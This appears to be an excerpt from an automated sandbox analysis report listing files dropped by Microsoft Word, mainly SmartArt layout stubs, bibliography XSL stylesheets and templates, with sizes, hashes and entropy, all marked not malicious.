                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):252
                                                                                                                                                Entropy (8bit):3.4680595384446202
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:fxnxUXivlE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyydGHmD0+dAH/luWvv
                                                                                                                                                MD5:D79B5DE6D93AC06005761D88783B3EE6
                                                                                                                                                SHA1:E05BDCE2673B6AA8CBB17A138751EDFA2264DB91
                                                                                                                                                SHA-256:96125D6804544B8D4E6AE8638EFD4BD1F96A1BFB9EEF57337FFF40BA9FF4CDD1
                                                                                                                                                SHA-512:34057F7B2AB273964CB086D8A7DF09A4E05D244A1A27E7589BDC7E5679AB5F587FAB52A2261DB22070DA11EF016F7386635A2B8E54D83730E77A7B142C2E3929
                                                                                                                                                Malicious:false
                                                                                                                                                 Preview:[File]; OriginalName: architecture.glox; Component: WordFiles; ReqVer: 14; StoreLocation: {My Templates}\SmartArt Graphics
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):5783
                                                                                                                                                Entropy (8bit):7.88616857639663
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:CDG4D+8VsXzXc2zLXTJ2XFY47pk2G7HVlwFzTXNbMfmn2ivLZcreFWw5fc9ADdZm:CDG4DRGY23l2Xu47GL7YtT9V29yWvWdk
                                                                                                                                                MD5:8109B3C170E6C2C114164B8947F88AA1
                                                                                                                                                SHA1:FC63956575842219443F4B4C07A8127FBD804C84
                                                                                                                                                SHA-256:F320B4BB4E57825AA4A40E5A61C1C0189D808B3EACE072B35C77F38745A4C416
                                                                                                                                                SHA-512:F8A8D7A6469CD3E7C31F3335DDCC349AD7A686730E1866F130EE36AA9994C52A01545CE73D60B642FFE0EE49972435D183D8CD041F2BB006A6CAF31BAF4924AC
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):254
                                                                                                                                                Entropy (8bit):3.4721586910685547
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:fxnxUX9+RclTloE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyteUTloGHmD0+dAH/luWvv
                                                                                                                                                MD5:4DD225E2A305B50AF39084CE568B8110
                                                                                                                                                SHA1:C85173D49FC1522121AA2B0B2E98ADF4BB95B897
                                                                                                                                                SHA-256:6F00DD73F169C73D425CB9895DAC12387E21C6E4C9C7DDCFB03AC32552E577F4
                                                                                                                                                SHA-512:0493AB431004191381FF84AD7CC46BD09A1E0FEEC16B3183089AA8C20CC7E491FAE86FE0668A9AC677F435A203E494F5E6E9E4A0571962F6021D6156B288B28A
                                                                                                                                                Malicious:false
                                                                                                                                                 Preview:[File]; OriginalName: chevronaccent.glox; Component: WordFiles; ReqVer: 14; StoreLocation: {My Templates}\SmartArt Graphics
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):4243
                                                                                                                                                Entropy (8bit):7.824383764848892
                                                                                                                                                Encrypted:false
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):264
                                                                                                                                                Entropy (8bit):3.4866056878458096
                                                                                                                                                Encrypted:false
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.h.e.m.e.P.i.c.t.u.r.e.A.c.c.e.n.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):6448
                                                                                                                                                Entropy (8bit):7.897260397307811
                                                                                                                                                Encrypted:false
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):246
                                                                                                                                                Entropy (8bit):3.5039994158393686
                                                                                                                                                Encrypted:false
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.a.b.b.e.d.A.r.c...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):3683
                                                                                                                                                Entropy (8bit):7.772039166640107
                                                                                                                                                Encrypted:false
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):374
                                                                                                                                                Entropy (8bit):3.5414485333689694
                                                                                                                                                Encrypted:false
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.e.x.t. .S.i.d.e.b.a.r. .(.A.n.n.u.a.l. .R.e.p.o.r.t. .R.e.d. .a.n.d. .B.l.a.c.k. .d.e.s.i.g.n.)...d.o.c.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Word 2007+
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):47296
                                                                                                                                                Entropy (8bit):6.42327948041841
                                                                                                                                                Encrypted:false
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):332
                                                                                                                                                Entropy (8bit):3.547857457374301
                                                                                                                                                Encrypted:false
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .h.a.r.v.a.r.d.a.n.g.l.i.a.2.0.0.8.o.f.f.i.c.e.o.n.l.i.n.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):284415
                                                                                                                                                Entropy (8bit):5.00549404077789
                                                                                                                                                Encrypted:false
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt"......xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.....<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="/">....<xsl:call-template name="Start"/>...</xsl:template>.....<xsl:template name="Start">....<xsl:choose>.....<xsl:when test="b:Version">......<xsl:text>2010.2.02</xsl:text>.....</xsl:when>.......<xsl:when test="b:XslVersion">......<xsl:text>2008</xsl:text>.....</xsl:when>.... <xsl:when test="b:StyleNameLocalized">.. <xsl:choose>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1033'">.. <xsl:text>Harvard - Anglia</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1025'">.. <xsl:text>Harvard - Anglia</xsl:text>.. </xsl:when>.. <x
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):16806
                                                                                                                                                Entropy (8bit):7.9519793977093505
                                                                                                                                                Encrypted:false
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):254
                                                                                                                                                Entropy (8bit):3.4720677950594836
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:fxnxUXOu9+MlWlk2E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnycMlWlzGHmD0+dAH/luWvv
                                                                                                                                                MD5:D04EC08EFE18D1611BDB9A5EC0CC00B1
                                                                                                                                                SHA1:668FF6DFE64D5306220341FC2C1353199D122932
                                                                                                                                                SHA-256:FA60500F951AFAF8FFDB6D1828456D60004AE1558E8E1364ADC6ECB59F5450C9
                                                                                                                                                SHA-512:97EBCCAF64FA33238B7CFC0A6D853EFB050D877E21EE87A78E17698F0BB38382FCE7F6C4D97D550276BD6B133D3099ECAB9CFCD739F31BFE545F4930D896EEC3
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[File] OriginalName: CircleProcess.glox Component: WordFiles ReqVer: 14 StoreLocation: {My Templates}\SmartArt Graphics
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):252
                                                                                                                                                Entropy (8bit):3.48087342759872
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:fxnxUXXt1MIae2E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyfMIaRGHmD0+dAH/luWvv
                                                                                                                                                MD5:69757AF3677EA8D80A2FBE44DEE7B9E4
                                                                                                                                                SHA1:26AF5881B48F0CB81F194D1D96E3658F8763467C
                                                                                                                                                SHA-256:0F14CA656CDD95CAB385F9B722580DDE2F46F8622E17A63F4534072D86DF97C3
                                                                                                                                                SHA-512:BDA862300BAFC407D662872F0BFB5A7F2F72FE1B7341C1439A22A70098FA50C81D450144E757087778396496777410ADCE4B11B655455BEDC3D128B80CFB472A
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[File] OriginalName: PictureFrame.glox Component: WordFiles ReqVer: 14 StoreLocation: {My Templates}\SmartArt Graphics
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):4326
                                                                                                                                                Entropy (8bit):7.821066198539098
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:+fF+Jrp7Yo5hnJiGa24TxEcpUeONo1w2NFocy2LQi33Z:2+f7YuhJdJ4TxEcmKwGkk3Z
                                                                                                                                                MD5:D32E93F7782B21785424AE2BEA62B387
                                                                                                                                                SHA1:1D5589155C319E28383BC01ED722D4C2A05EF593
                                                                                                                                                SHA-256:2DC7E71759D84EF8BB23F11981E2C2044626FEA659383E4B9922FE5891F5F478
                                                                                                                                                SHA-512:5B07D6764A6616A7EF25B81AB4BD4601ECEC1078727BFEAB4A780032AD31B1B26C7A2306E0DBB5B39FC6E03A3FC18AD67C170EA9790E82D8A6CEAB8E7F564447
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):292
                                                                                                                                                Entropy (8bit):3.5026803317779778
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:fxnxUXC89ADni8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyf9ADiNGHmD0wbnKYZAH/lMZqiv
                                                                                                                                                MD5:A0D51783BFEE86F3AC46A810404B6796
                                                                                                                                                SHA1:93C5B21938DA69363DBF79CE594C302344AF9D9E
                                                                                                                                                SHA-256:47B43E7DBDF8B25565D874E4E071547666B08D7DF4D736EA8521591D0DED640F
                                                                                                                                                SHA-512:CA3DB5A574745107E1D6CAA60E491F11D8B140637D4ED31577CC0540C12FDF132D8BC5EBABEA3222F4D7BA1CA016FF3D45FE7688D355478C27A4877E6C4D0D75
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[File] OriginalName: gosttitle.xsl Component: WordFiles ReqVer: 14 Executable: {WD} StoreLocation: {My Templates} Command: /f {FilePath}
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):251032
                                                                                                                                                Entropy (8bit):5.102652100491927
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:hwprA5R95vtfb8p4bgWPwW6/m26AnV9IBgIkqm6HITUZJcjUZS1XkaNPQTlvB2zr:JA
                                                                                                                                                MD5:F425D8C274A8571B625EE66A8CE60287
                                                                                                                                                SHA1:29899E309C56F2517C7D9385ECDBB719B9E2A12B
                                                                                                                                                SHA-256:DD7B7878427276AF5DBF8355ECE0D1FE5D693DF55AF3F79347F9D20AE50DB938
                                                                                                                                                SHA-512:E567F283D903FA533977B30FD753AA1043B9DDE48A251A9AC6777A3B67667443FEAD0003765A630D0F840B6C275818D2F903B6CB56136BEDCC6D9BDD20776564
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):260
                                                                                                                                                Entropy (8bit):3.4895685222798054
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:fxnxUX4cPBl4xoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyPl4xoGHmD0+dAH/luWvv
                                                                                                                                                MD5:63E8B0621B5DEFE1EF17F02EFBFC2436
                                                                                                                                                SHA1:2D02AD4FD9BF89F453683B7D2B3557BC1EEEE953
                                                                                                                                                SHA-256:9243D99795DCDAD26FA857CB2740E58E3ED581E3FAEF0CB3781CBCD25FB4EE06
                                                                                                                                                SHA-512:A27CDA84DF5AD906C9A60152F166E7BD517266CAA447195E6435997280104CBF83037F7B05AE9D4617323895DCA471117D8C150E32A3855156CB156E15FA5864
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[File] OriginalName: VaryingWidthList.glox Component: WordFiles ReqVer: 14 StoreLocation: {My Templates}\SmartArt Graphics
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):3075
                                                                                                                                                Entropy (8bit):7.716021191059687
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:96yn4sOBoygpySCCxwKsZCB2oLEIK+aQpUNLRQWtmMamIZxAwCC2QnyODhVOzP4:l0vCxJsZQ2ofpKvtmMdIZxAwJyODhVOE
                                                                                                                                                MD5:67766FF48AF205B771B53AA2FA82B4F4
                                                                                                                                                SHA1:0964F8B9DC737E954E16984A585BDC37CE143D84
                                                                                                                                                SHA-256:160D05B4CB42E1200B859A2DE00770A5C9EBC736B70034AFC832A475372A1667
                                                                                                                                                SHA-512:AC28B0B4A9178E9B424E5893870913D80F4EE03D595F587AA1D3ACC68194153BAFC29436ADFD6EA8992F0B00D17A43CFB42C529829090AF32C3BE591BD41776D
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):286
                                                                                                                                                Entropy (8bit):3.5502940710609354
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:fxnxUXfQICl8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyXClNGHmD0wbnKYZAH/lMZqiv
                                                                                                                                                MD5:9B8D7EFE8A69E41CDC2439C38FE59FAF
                                                                                                                                                SHA1:034D46BEC5E38E20E56DD905E2CA2F25AF947ED1
                                                                                                                                                SHA-256:70042F1285C3CD91DDE8D4A424A5948AE8F1551495D8AF4612D59709BEF69DF2
                                                                                                                                                SHA-512:E50BB0C68A33D35F04C75F05AD4598834FEC7279140B1BB0847FF39D749591B8F2A0C94DA4897AAF6C33C50C1D583A836B0376015851910A77604F8396C7EF3C
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[File] OriginalName: iso690.xsl Component: WordFiles ReqVer: 14 Executable: {WD} StoreLocation: {My Templates} Command: /f {FilePath}
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):270198
                                                                                                                                                Entropy (8bit):5.073814698282113
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:JwprAiaR95vtfb8pDbgWPzDCvCmvQursq7vImej/yQ4SS1apSiQhHDOruvoVeMUX:We
                                                                                                                                                MD5:FF0E07EFF1333CDF9FC2523D323DD654
                                                                                                                                                SHA1:77A1AE0DD8DBC3FEE65DD6266F31E2A564D088A4
                                                                                                                                                SHA-256:3F925E0CC1542F09DE1F99060899EAFB0042BB9682507C907173C392115A44B5
                                                                                                                                                SHA-512:B4615F995FAB87661C2DBE46625AA982215D7BDE27CAFAE221DCA76087FE76DA4B4A381943436FCAC1577CB3D260D0050B32B7B93E3EB07912494429F126BB3D
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):256
                                                                                                                                                Entropy (8bit):3.464918006641019
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:fxnxUXR+EqRGRnRE3QepmlJ0+3FbnKfZObdADxp1RDWlVwv:fxnyB+5RmRGHmD0wbnKYZAH+Vwv
                                                                                                                                                MD5:93149E194021B37162FD86684ED22401
                                                                                                                                                SHA1:1B31CAEBE1BBFA529092BE834D3B4AD315A6F8F1
                                                                                                                                                SHA-256:50BE99A154A6F632D49B04FCEE6BCA4D6B3B4B7C1377A31CE9FB45C462D697B2
                                                                                                                                                SHA-512:410A7295D470EC85015720B2B4AC592A472ED70A04103D200FA6874BEA6A423AF24766E98E5ACAA3A1DBC32C44E8790E25D4611CD6C0DBFFFE8219D53F33ACA7
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[File] OriginalName: Equations.dotx Component: WordFiles ReqVer: 14 Executable: {WD} StoreLocation: {WD Document Parts}
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Word 2007+
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):51826
                                                                                                                                                Entropy (8bit):5.541375256745271
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:erH5dYPCA4t3aEFGiSUDtYfEbi5Ry/AT7/6tHODaFlDSomurYNfT4A0VIwWNS89u:Q6Cbh9tENyWdaFUSYNfZS89/3qtEu
                                                                                                                                                MD5:2AB22AC99ACFA8A82742E774323C0DBD
                                                                                                                                                SHA1:790F8B56DF79641E83A16E443A75A66E6AA2F244
                                                                                                                                                SHA-256:BC9D45D0419A08840093B0BF4DCF96264C02DFE5BD295CD9B53722E1DA02929D
                                                                                                                                                SHA-512:E5715C0ECF35CE250968BD6DE5744D28A9F57D20FD6866E2AF0B2D8C8F80FEDC741D48F554397D61C5E702DA896BD33EED92D778DBAC71E2E98DCFB0912DE07B
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):332
                                                                                                                                                Entropy (8bit):3.4871192480632223
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:fxnxUXsdDUaw93Ti8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyoRw9eNGHmD0wbnKYZAH/lMZqiv
                                                                                                                                                MD5:333BA58FCE326DEA1E4A9DE67475AA95
                                                                                                                                                SHA1:F51FAD5385DC08F7D3E11E1165A18F2E8A028C14
                                                                                                                                                SHA-256:66142D15C7325B98B199AB6EE6F35B7409DE64EBD5C0AB50412D18CBE6894097
                                                                                                                                                SHA-512:BFEE521A05B72515A8D4F7D13D8810846DC60F1E85C363FFEBD6CACD23AE8D2E664C563FC74700A4ED4E358F378508D25C46CB5BE1CF587E2E278EBC22BB2625
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .m.l.a.s.e.v.e.n.t.h.e.d.i.t.i.o.n.o.f.f.i.c.e.o.n.l.i.n.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):254875
                                                                                                                                                Entropy (8bit):5.003842588822783
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:MwprAnniNgtfbzbOWPuv7kOMBLitjAUjTQLrYHwR0TnyDkHqV3iPr1zHX5T6SSXj:a
                                                                                                                                                MD5:377B3E355414466F3E3861BCE1844976
                                                                                                                                                SHA1:0B639A3880ACA3FD90FA918197A669CC005E2BA4
                                                                                                                                                SHA-256:4AC5B26C5E66E122DE80243EF621CA3E1142F643DD2AD61B75FF41CFEE3DFFAF
                                                                                                                                                SHA-512:B050AD52A8161F96CBDC880DD1356186F381B57159F5010489B04528DB798DB955F0C530465AB3ECD5C653586508429D98336D6EB150436F1A53ABEE0697AEB9
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>...</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />......<xsl:variable name="prop_EndChars">.....<xsl:call-template name="templ_prop_EndChars"/>....</xsl:variable>......<xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$parameters" />......
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):290
                                                                                                                                                Entropy (8bit):3.5081874837369886
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:fxnxUXCOzi8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnydONGHmD0wbnKYZAH/lMZqiv
                                                                                                                                                MD5:8D9B02CC69FA40564E6C781A9CC9E626
                                                                                                                                                SHA1:352469A1ABB8DA1DC550D7E27924E552B0D39204
                                                                                                                                                SHA-256:1D4483830710EF4A2CC173C3514A9F4B0ACA6C44DB22729B7BE074D18C625BAE
                                                                                                                                                SHA-512:8B7DB2AB339DD8085104855F847C48970C2DD32ADB0B8EEA134A64C5CC7DE772615F85D057F4357703B65166C8CF0C06F4F6FD3E60FFC80DA3DD34B16D5B1281
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[File] OriginalName: gostname.xsl Component: WordFiles ReqVer: 14 Executable: {WD} StoreLocation: {My Templates} Command: /f {FilePath}
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):255948
                                                                                                                                                Entropy (8bit):5.103631650117028
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:gwprAm795vtfb8p4bgWPWEtTmtcRCDPThNPFQwB+26RxlsIBkAgRMBHcTCwsHe5a:kW
                                                                                                                                                MD5:9888A214D362470A6189DEFF775BE139
                                                                                                                                                SHA1:32B552EB3C73CD7D0D9D924C96B27A86753E0F97
                                                                                                                                                SHA-256:C64ED5C2A323C00E84272AD3A701CAEBE1DCCEB67231978DE978042F09635FA7
                                                                                                                                                SHA-512:8A75FC2713003FA40B9730D29C786C76A796F30E6ACE12064468DD2BB4BF97EF26AC43FFE1158AB1DB06FF715D2E6CDE8EF3E8B7C49AA1341603CE122F311073
                                                                                                                                                Malicious:false
